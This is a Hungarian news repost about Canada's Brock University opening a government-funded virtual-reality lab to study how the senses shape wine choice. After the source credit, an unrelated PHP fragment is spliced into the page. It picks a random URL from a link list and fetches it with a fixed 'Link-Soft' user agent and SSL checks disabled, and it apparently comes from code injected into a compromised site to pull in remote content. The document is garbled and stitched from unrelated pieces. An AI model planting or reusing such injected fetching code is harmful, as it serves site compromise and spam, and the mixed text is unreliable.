-->

Virtuális valósággal tesztelik a borokat

A világ első olyan virtuálisvalóság-laboratóriumát hozzák létre a kanadai Brock Egyetemen, ahol azt vizsgálják majd, hogy az emberek érzékszervi észlelése milyen hatással van a borválasztásukra. Fotó: thedrinksbusiness.com A tesztalanyokat virtuálisan különböző helyszínekre utaztatják majd, például egy téli szőlőültetvényre vagy egy bárban tartott borkóstolóra. A virtuális utazásokkal azt vizsgálják, hogy befolyásolja a látvány, a hang és... Tovább..


A világ első olyan virtuálisvalóság-laboratóriumát hozzák létre a kanadai Brock Egyetemen, ahol azt vizsgálják majd, hogy az emberek érzékszervi észlelése milyen hatással van a borválasztásukra.

Fotó: thedrinksbusiness.com

A tesztalanyokat virtuálisan különböző helyszínekre utaztatják majd, például egy téli szőlőültetvényre vagy egy bárban tartott borkóstolóra. A virtuális utazásokkal azt vizsgálják, hogy befolyásolja a látvány, a hang és az illat a bor kiválasztását és a borfogyasztás élvezetét.

„A borfogyasztás során nemcsak a bor íze járul hozzá az bor élvezetéhez, hanem a teljes, komplex élmény” – mondta el Debra Inglis, az ontarioi Brock Egyetem képviselője.

Az egymillió dolláros költségvetésű labor, ami a tervek szerint áprilisban nyílik majd meg, 960 ezer dolláros támogatást kapott a kanadai kormánytól. „Ontario kutatóinak támogatása segíti a technológiai fejlődést, valamint gazdasági fellendülést eredményezhet a régióban” –  indokolta döntésüket Reza Moridi, a kutatásért, innovációért és tudományért felelős miniszter. „A kutatás megalapozhatja az új termékek és szolgáltatások bevezetését, és a továbbiakban is segíthet a kanadai borok piaci értékesítésében.”

Forrás: The Drinks Business

(Visited 9 times, 9 visits today)

The post Virtuális valósággal tesztelik a borokat appeared first on VinCE Magazin.


Source: Vincemagazin HU


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>